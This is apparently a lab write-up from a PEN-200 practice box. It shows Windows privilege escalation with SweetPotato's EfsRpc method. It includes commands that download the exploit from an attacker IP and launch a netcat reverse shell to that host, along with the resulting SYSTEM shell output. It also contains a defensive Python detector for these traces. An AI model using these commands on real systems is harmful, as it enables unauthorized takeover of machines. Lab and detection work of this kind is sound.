SweetPotato


The compromised tony account has SeImpersonatePrivilege set, which makes the target system vulnerable to the potato exploits. Given the target system is Microsoft Windows 10 Pro, I will be using SweetPotato.

SweetPotato is a collection of various native Windows privilege escalation techniques from service accounts to SYSTEM. It was created by @ethicalchaos and includes:

  • RottenPotato
  • Weaponized JuicyPotato with BITS WinRM discovery
  • PrintSpoofer discovery and original exploit
  • EfsRpc built on EfsPotato
  • PetitPotam

Exploit


The exploit binary is available online.

Exploitation


PS C:\tmp> iwr -Uri http://192.168.45.192/SweetPotato.exe -OutFile C:\tmp\SweetPotato.exe

Delivery complete

PS C:\tmp> cmd /c C:\tmp\SweetPotato.exe -p "C:\Windows\temp\nc.exe" -e EfsRpc -a "192.168.45.192 1234 -e powershell"
 
SweetPotato by @_EthicalChaos_
  Orignal RottenPotato code and exploit by @foxglovesec
  Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
  PrintSpoofer discovery and original exploit by @itm4n
  EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
[+] Attempting NP impersonation using method EfsRpc to launch C:\Windows\temp\nc.exe
[+] Triggering name pipe access on evil PIPE \\localhost/pipe/7b9a765a-8471-42f9-a2c7-68abd56b8c57/\7b9a765a-8471-42f9-a2c7-68abd56b8c57\7b9a765a-8471-42f9-a2c7-68abd56b8c57
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

The command above uses the EfsRpc method, which targets the MS-EFSR EfsRpcOpenFileRaw call and relies on SeImpersonatePrivilege to impersonate the SYSTEM token it obtains.
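From the defender's side, the session above leaves two traces in endpoint telemetry: a GUID-named pipe created by a process that is not SYSTEM, and a SYSTEM child spawned from a parent running as tony. The following Python is an added example (not part of these notes or the SweetPotato project) that flags both patterns over constructed Sysmon-style records; the event shape, pids, benign rows and the two heuristics are assumptions.

```python
import re

# Constructed sample records (not real telemetry) in a simplified Sysmon-style
# shape: event 17 = named pipe created, event 1 = process created. Values are
# modelled on the session above; pids and the benign rows are invented.
SAMPLE_EVENTS = [
    {"event": 17, "pid": 4120, "user": r"JACKO\tony",
     "image": r"C:\tmp\SweetPotato.exe",
     "pipe": r"\7b9a765a-8471-42f9-a2c7-68abd56b8c57\7b9a765a-8471-42f9-a2c7-68abd56b8c57"},
    {"event": 1, "pid": 4188, "ppid": 4120, "user": r"NT AUTHORITY\SYSTEM",
     "image": r"C:\Windows\temp\nc.exe",
     "parent_user": r"JACKO\tony", "parent_image": r"C:\tmp\SweetPotato.exe"},
    # Benign: a service host started by the service control manager, SYSTEM -> SYSTEM.
    {"event": 1, "pid": 900, "ppid": 600, "user": r"NT AUTHORITY\SYSTEM",
     "image": r"C:\Windows\System32\svchost.exe",
     "parent_user": r"NT AUTHORITY\SYSTEM", "parent_image": r"C:\Windows\System32\services.exe"},
    # Benign: an ordinary user shell spawned from Explorer, tony -> tony.
    {"event": 1, "pid": 3300, "ppid": 2100, "user": r"JACKO\tony",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_user": r"JACKO\tony", "parent_image": r"C:\Windows\explorer.exe"},
]

SYSTEM = r"NT AUTHORITY\SYSTEM"
# A bare GUID used as a pipe path component, as in the "evil PIPE" line of the tool output.
GUID_PIPE = re.compile(r"\\[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}(?:\\|$)", re.I)


def find_potato_indicators(events):
    """Return one alert string per event matching a potato-style pattern.

    Two heuristics (assumptions; tune with a per-host allowlist, since some
    installers and management agents legitimately cross the SYSTEM boundary):
      1. A GUID-named pipe created by a process that is not SYSTEM.
      2. A SYSTEM process whose parent ran under a non-SYSTEM account, i.e.
         the parent used a duplicated token rather than its own.
    """
    alerts = []
    for ev in events:
        if ev["event"] == 17 and ev["user"] != SYSTEM and GUID_PIPE.search(ev["pipe"]):
            alerts.append(f"guid-pipe: pid {ev['pid']} ({ev['user']}, {ev['image']}) "
                          f"created {ev['pipe']}")
        elif ev["event"] == 1 and ev["user"] == SYSTEM and ev["parent_user"] != SYSTEM:
            alerts.append(f"token-misuse: {ev['image']} (pid {ev['pid']}) runs as SYSTEM "
                          f"but parent {ev['parent_image']} runs as {ev['parent_user']}")
    return alerts


if __name__ == "__main__":
    for line in find_potato_indicators(SAMPLE_EVENTS):
        print(line)
```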

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/jacko]
└─$ nnc 1234 
listening on [any] 1234 ...
connect to [192.168.45.192] from (UNKNOWN) [192.168.236.66] 49829
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
 
Try the new cross-platform PowerShell https://aka.ms/pscore6
 
PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> hostname
hostname
jacko
PS C:\Windows\system32> ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.236.66
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.236.254

System-level compromise